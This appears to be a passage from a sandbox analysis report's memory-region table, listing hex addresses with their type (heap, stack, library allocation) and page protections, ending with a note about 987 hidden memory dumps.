page read and write
76F4583000
stack
page read and write
20080D7C000
trusted library allocation
page read and write
7FFD344C0000
trusted library allocation
page read and write
CC6717F000
stack
page read and write
7FFD345B0000
trusted library allocation
page read and write
7FFD342FB000
trusted library allocation
page read and write
1B90E000
stack
page read and write
23A1A3B3000
heap
page read and write
7FFD344F0000
trusted library allocation
page read and write
AC78E77000
stack
page read and write
200F0500000
trusted library section
page read and write
2A71F7B5000
heap
page read and write
1303C000
trusted library allocation
page read and write
23A1A4DD000
heap
page read and write
7FFD342E0000
trusted library allocation
page read and write
7FFD34452000
trusted library allocation
page read and write
2A706D20000
heap
page readonly
7FFD342D0000
trusted library allocation
page read and write
1BFBC000
heap
page read and write
18677CC0000
heap
page read and write
2A71F43F000
heap
page read and write
7FFD345D0000
trusted library allocation
page read and write
200F1EAA000
heap
page read and write
2A71F5DA000
heap
page read and write
1BF80000
heap
page read and write
BE0000
heap
page read and write
1225000
heap
page read and write
23A11F49000
trusted library allocation
page read and write
2A716FC0000
trusted library allocation
page read and write
7FFD342C0000
trusted library allocation
page read and write
18679FA9000
heap
page read and write
2A707FE4000
trusted library allocation
page read and write
455AFD000
stack
page read and write
AC791F8000
stack
page read and write
7FFD34480000
trusted library allocation
page execute and read and write
7FFD346F0000
trusted library allocation
page read and write
7FFD34540000
trusted library allocation
page read and write
20081E28000
trusted library allocation
page read and write
23A1A3AF000
heap
page read and write
7DF46B2B0000
trusted library allocation
page execute and read and write
1C17C000
stack
page read and write
7FFD3437C000
trusted library allocation
page execute and read and write
7FFD34612000
trusted library allocation
page read and write
23A1A387000
heap
page read and write
7FFD342BD000
trusted library allocation
page execute and read and write
18601E20000
trusted library allocation
page read and write
DD0000
heap
page read and write
3021000
trusted library allocation
page read and write
2A706D60000
trusted library allocation
page read and write
2A71F8B0000
heap
page read and write
12E43000
trusted library allocation
page read and write
200F2397000
heap
page read and write
7FFD34300000
trusted library allocation
page read and write
23A1A3AB000
heap
page read and write
CC671FE000
stack
page read and write
CC6727B000
stack
page read and write
7FFD34560000
trusted library allocation
page read and write
7FFD34600000
trusted library allocation
page read and write
1C9B8000
stack
page read and write
1867A080000
heap
page read and write
7FFD3439C000
trusted library allocation
page execute and read and write
7FFD34460000
trusted library allocation
page read and write
2C50000
heap
page execute and read and write
23A02D2F000
trusted library allocation
page read and write
7FFD345C0000
trusted library allocation
page read and write
11F6000
heap
page read and write
2A705352000
heap
page read and write
20081309000
trusted library allocation
page read and write
23A1A1B0000
heap
page execute and read and write
23A1A270000
heap
page read and write
2A7053C2000
heap
page read and write
7FFD34622000
trusted library allocation
page read and write
18601DDB000
trusted library allocation
page read and write
23A11C61000
trusted library allocation
page read and write
20090031000
trusted library allocation
page read and write
7FFD34570000
trusted library allocation
page read and write
E9C000
heap
page read and write
20081E03000
trusted library allocation
page read and write
7FFD34550000
trusted library allocation
page read and write
7FFD346D0000
trusted library allocation
page read and write
76F5BCB000
stack
page read and write
7FFD346F0000
trusted library allocation
page read and write
1860188D000
trusted library allocation
page read and write
45698C000
stack
page read and write
7FFD34390000
trusted library allocation
page read and write
23A1A426000
heap
page read and write
2A71F44E000
heap
page read and write
23A1A284000
heap
page read and write
1BFB9000
heap
page read and write
1860133E000
trusted library allocation
page read and write
7FFD342F4000
trusted library allocation
page read and write
7FFD342B3000
trusted library allocation
page execute and read and write
11D0000
heap
page read and write
2A708166000
trusted library allocation
page read and write
7FFD34590000
trusted library allocation
page read and write
7FFD34500000
trusted library allocation
page read and write
7FFD34550000
trusted library allocation
page read and write
18677F70000
heap
page readonly
1CF6A000
stack
page read and write
7FFD34396000
trusted library allocation
page read and write
7FFD345D0000
trusted library allocation
page read and write
7FFD34590000
trusted library allocation
page read and write
15F5000
heap
page read and write
ED8000
heap
page read and write
7FFD34618000
trusted library allocation
page read and write
10F4000
stack
page read and write
18610021000
trusted library allocation
page read and write
EBD000
heap
page read and write
7FFD34609000
trusted library allocation
page read and write
7FFD344B0000
trusted library allocation
page execute and read and write
186798D5000
heap
page read and write
7FFD3430C000
trusted library allocation
page execute and read and write
7FFD34570000
trusted library allocation
page read and write
7FFD34550000
trusted library allocation
page read and write
7FFD34620000
trusted library allocation
page read and write
18678015000
heap
page read and write
7FFD34670000
trusted library allocation
page read and write
DD0000
heap
page read and write
200F04F0000
trusted library section
page read and write
2008022A000
trusted library allocation
page read and write
18600C71000
trusted library allocation
page read and write
1BD7E000
stack
page read and write
18610001000
trusted library allocation
page read and write
7FFD3461A000
trusted library allocation
page read and write
23A03004000
trusted library allocation
page read and write
7FFD34510000
trusted library allocation
page read and write
AC7899F000
stack
page read and write
1450000
trusted library allocation
page read and write
7FFD342E2000
trusted library allocation
page read and write
23A02EE7000
trusted library allocation
page read and write
7FFD343E0000
trusted library allocation
page execute and read and write
23A00490000
trusted library allocation
page read and write
23A01C35000
heap
page read and write
18610011000
trusted library allocation
page read and write
7FFD345E0000
trusted library allocation
page read and write
18600001000
trusted library allocation
page read and write
7FFD34492000
trusted library allocation
page read and write
7FFD34360000
trusted library allocation
page read and write
7FFD342CD000
trusted library allocation
page execute and read and write
2A707BBD000
trusted library allocation
page read and write
7FFD34700000
trusted library allocation
page read and write
23A1A15A000
heap
page read and write
76F49F9000
stack
page read and write
2A707F25000
trusted library allocation
page read and write
7FFD342E3000
trusted library allocation
page execute and read and write
2A705340000
heap
page read and write
2A707A02000
trusted library allocation
page read and write
7FFD3464C000
trusted library allocation
page read and write
7FFD344D0000
trusted library allocation
page execute and read and write
7FFD34360000
trusted library allocation
page read and write
7DF401F00000
trusted library allocation
page execute and read and write
23A1A400000
heap
page read and write
23A01CC6000
trusted library allocation
page read and write
7FFD34396000
trusted library allocation
page execute and read and write
1860194F000
trusted library allocation
page read and write
1B87E000
stack
page read and write
1170000
heap
page read and write
186797F0000
trusted library allocation
page read and write
7FFD345A0000
trusted library allocation
page read and write
7FFD345F0000
trusted library allocation
page read and write
7FFD34560000
trusted library allocation
page read and write
76F4BF7000
stack
page read and write
7FFD342C0000
trusted library allocation
page read and write
7FFD342C3000
trusted library allocation
page read and write
7FFD3430C000
trusted library allocation
page execute and read and write
7FFD345E0000
trusted library allocation
page read and write
7FFD34471000
trusted library allocation
page read and write
2A71729F000
trusted library allocation
page read and write
7FFD34700000
trusted library allocation
page read and write
20080F6F000
trusted library allocation
page read and write
1D070000
heap
page read and write
18600FCD000
trusted library allocation
page read and write
23A1A4F7000
heap
page read and write
186011DC000
trusted library allocation
page read and write
455979000
stack
page read and write
76F45CE000
stack
page read and write
145F000
stack
page read and write
7FFD345E3000
trusted library allocation
page read and write
7FFD344A2000
trusted library allocation
page read and write
7FFD3461C000
trusted library allocation
page read and write
23A11F2F000
trusted library allocation
page read and write
1BB0E000
stack
page read and write
1867A180000
heap
page read and write
2A71F7E9000
heap
page read and write
7FFD34510000
trusted library allocation
page read and write
20081065000
trusted library allocation
page read and write
AC79ECD000
stack
page read and write
200F2325000
heap
page read and write
18600A52000
trusted library allocation
page read and write
7FFD34609000
trusted library allocation
page read and write
7FFD344B0000
trusted library allocation
page execute and read and write
23A03A5F000
trusted library allocation
page read and write
2A71EFBF000
heap
page read and write
1867A1FA000
heap
page read and write
2FEF000
stack
page read and write
20081DDE000
trusted library allocation
page read and write
7FFD345E0000
trusted library allocation
page read and write
200F02F2000
heap
page read and write
2E3E000
stack
page read and write
7FFD34630000
trusted library allocation
page read and write
76F4DFE000
stack
page read and write
7FFD34650000
trusted library allocation
page read and write
7FFD34700000
trusted library allocation
page read and write
7FFD3446A000
trusted library allocation
page read and write
18601006000
trusted library allocation
page read and write
2A71F833000
heap
page read and write
23A11C50000
trusted library allocation
page read and write
1495000
heap
page read and write
7FFD34628000
trusted library allocation
page read and write
7FFD34604000
trusted library allocation
page read and write
76F5B4C000
stack
page read and write
23A03A1A000
trusted library allocation
page read and write
18679A30000
heap
page read and write
7DF46B2C0000
trusted library allocation
page execute and read and write
18679E60000
heap
page read and write
20081123000
trusted library allocation
page read and write
2A71F5E3000
heap
page read and write
1B570000
heap
page read and write
7FFD34634000
trusted library allocation
page read and write
2A706E70000
heap
page execute and read and write
7FFD34619000
trusted library allocation
page read and write
7FFD342E4000
trusted library allocation
page read and write
7FFD345D0000
trusted library allocation
page read and write
7FFD34462000
trusted library allocation
page read and write
23A1A49C000
heap
page read and write
7FFD345BF000
trusted library allocation
page read and write
20081952000
trusted library allocation
page read and write
18677D71000
heap
page read and write
2A7052C0000
heap
page read and write
CC669AE000
stack
page read and write
1180000
heap
page execute and read and write
186797C0000
trusted library allocation
page read and write
18677DB5000
heap
page read and write
7FFD346E0000
trusted library allocation
page execute and read and write
2A71F91C000
heap
page read and write
18678010000
heap
page read and write
2A71F5B0000
heap
page read and write
E90000
heap
page read and write
20080F7C000
trusted library allocation
page read and write
1355000
heap
page read and write
7FFD346D3000
trusted library allocation
page read and write
7FFD34366000
trusted library allocation
page read and write
7FFD34580000
trusted library allocation
page read and write
2A707F36000
trusted library allocation
page read and write
12CC000
heap
page read and write
7FFD345B0000
trusted library allocation
page read and write
23A01C30000
heap
page read and write
1C7BF000
stack
page read and write
7FFD34400000
trusted library allocation
page execute and read and write
7FFD34630000
trusted library allocation
page read and write
7FFD34730000
trusted library allocation
page read and write
F00000
heap
page read and write
200804CD000
trusted library allocation
page read and write
2A707F57000
trusted library allocation
page read and write
7FFD34300000
trusted library allocation
page read and write
7FFD342CD000
trusted library allocation
page execute and read and write
7FFD345F3000
trusted library allocation
page read and write
7FFD34700000
trusted library allocation
page read and write
1148000
heap
page read and write
2A708840000
trusted library allocation
page read and write
23A01AF0000
trusted library allocation
page read and write
7FFD3446A000
trusted library allocation
page read and write
455563000
stack
page read and write
23A1A4EB000
heap
page read and write
1B050000
trusted library allocation
page read and write
CC66DF7000
stack
page read and write
23A1A366000
heap
page read and write
2A71F7A4000
heap
page read and write
7FFD34510000
trusted library allocation
page read and write
23A19C48000
heap
page read and write
23A1A3E9000
heap
page read and write
200F267B000
heap
page read and write
23A1A114000
heap
page read and write
AC79DCE000
stack
page read and write
200F2687000
heap
page read and write
7FFD34630000
trusted library allocation
page read and write
1220000
heap
page read and write
200902EF000
trusted library allocation
page read and write
200F2795000
heap
page read and write
23A1A1D6000
heap
page execute and read and write
7FFD342BD000
trusted library allocation
page execute and read and write
23A02E8F000
trusted library allocation
page read and write
18677DB8000
heap
page read and write
455EBE000
stack
page read and write
2BCF000
stack
page read and write
23A029B2000
trusted library allocation
page read and write
23A02BD7000
trusted library allocation
page read and write
2A707E40000
trusted library allocation
page read and write
7FFD344B0000
trusted library allocation
page read and write
2A707F1C000
trusted library allocation
page read and write
7FFD34740000
trusted library allocation
page read and write
12BD8000
trusted library allocation
page read and write
AC7917E000
stack
page read and write
200F03D6000
heap
page read and write
ED4000
heap
page read and write
AC79E49000
stack
page read and write
23A004C5000
heap
page read and write
7FFD34520000
trusted library allocation
page read and write
F66000
heap
page read and write
1867A108000
heap
page read and write
2A706CB0000
heap
page read and write
7FFD34618000
trusted library allocation
page read and write
18679F63000
heap
page read and write
1440000
trusted library allocation
page read and write
1B15D000
stack
page read and write
200811DB000
trusted library allocation
page read and write
1B3CD000
stack
page read and write
2A706CF0000
trusted library allocation
page read and write
23A02C72000
trusted library allocation
page read and write
7FFD34600000
trusted library allocation
page read and write
23A1A3C3000
heap
page read and write
2A71F5E0000
heap
page read and write
20080088000
trusted library allocation
page read and write
23A0210D000
trusted library allocation
page read and write
200F0530000
trusted library allocation
page read and write
7FFD342B0000
trusted library allocation
page read and write
455F3B000
stack
page read and write
117A000
heap
page read and write
B64000
stack
page read and write
76F487E000
stack
page read and write
15AE000
stack
page read and write
2A71F855000
heap
page read and write
7FFD345A0000
trusted library allocation
page read and write
1410000
trusted library allocation
page read and write
200F0327000
heap
page read and write
7FFD34396000
trusted library allocation
page execute and read and write
7FFD34650000
trusted library allocation
page read and write
7FFD344A4000
trusted library allocation
page read and write
7FFD34620000
trusted library allocation
page read and write
20080F67000
trusted library allocation
page read and write
455D3A000
stack
page read and write
2A70702C000
trusted library allocation
page read and write
18679FC7000
heap
page read and write
7FFD345E3000
trusted library allocation
page read and write
455B79000
stack
page read and write
11A5000
heap
page read and write
18677F40000
trusted library allocation
page read and write
7FFD342B4000
trusted library allocation
page read and write
7FFD34640000
trusted library allocation
page read and write
7FFD346F0000
trusted library allocation
page read and write
AC7907A000
stack
page read and write
18679EF3000
heap
page read and write
200810C0000
trusted library allocation
page read and write
200F279B000
heap
page read and write
115E000
stack
page read and write
CC66CFA000
stack
page read and write
23A00090000
heap
page read and write
23A1A3B7000
heap
page read and write
2A706FB1000
trusted library allocation
page read and write
2A708DD8000
trusted library allocation
page read and write
2A705310000
heap
page read and write
7FFD343E0000
trusted library allocation
page execute and read and write
1100000
heap
page read and write
455CB8000
stack
page read and write
2A7172B9000
trusted library allocation
page read and write
7FFD342ED000
trusted library allocation
page execute and read and write
13EE000
stack
page read and write
7FFD34612000
trusted library allocation
page read and write
1BE7E000
stack
page read and write
23A1A580000
trusted library allocation
page read and write
7FFD346D0000
trusted library allocation
page execute and read and write
23A0015E000
heap
page read and write
1232000
heap
page read and write
7FFD342ED000
trusted library allocation
page execute and read and write
2C10000
trusted library allocation
page read and write
E00000
heap
page read and write
7FFD344C2000
trusted library allocation
page read and write
7FFD3436C000
trusted library allocation
page execute and read and write
7FFD34520000
trusted library allocation
page read and write
200F02C0000
heap
page read and write
1C5BE000
stack
page read and write
18677FC0000
heap
page execute and read and write
7FFD34500000
trusted library allocation
page read and write
200F2680000
heap
page read and write
7DF4C80A0000
trusted library allocation
page execute and read and write
23A02E1A000
trusted library allocation
page read and write
F68000
heap
page read and write
7FFD342B4000
trusted library allocation
page read and write
2A71F4F6000
heap
page read and write
7FFD34396000
trusted library allocation
page execute and read and write
1B5BD000
stack
page read and write
23A0283A000
trusted library allocation
page read and write
7FFD342E0000
trusted library allocation
page read and write
1140000
heap
page read and write
23A00162000
heap
page read and write
7FFD3436C000
trusted library allocation
page execute and read and write
BB0000
heap
page read and write
7FFD34706000
trusted library allocation
page read and write
7FFD342C2000
trusted library allocation
page read and write
7FFD34452000
trusted library allocation
page read and write
2A70747D000
trusted library allocation
page read and write
7FFD344E0000
trusted library allocation
page read and write
2A716FD1000
trusted library allocation
page read and write
23A1A406000
heap
page read and write
76F4A7E000
stack
page read and write
456A0E000
stack
page read and write
2A708DD3000
trusted library allocation
page read and write
2A7052D0000
heap
page read and write
76F4FFB000
stack
page read and write
There are 987 hidden memdumps, click here to show them.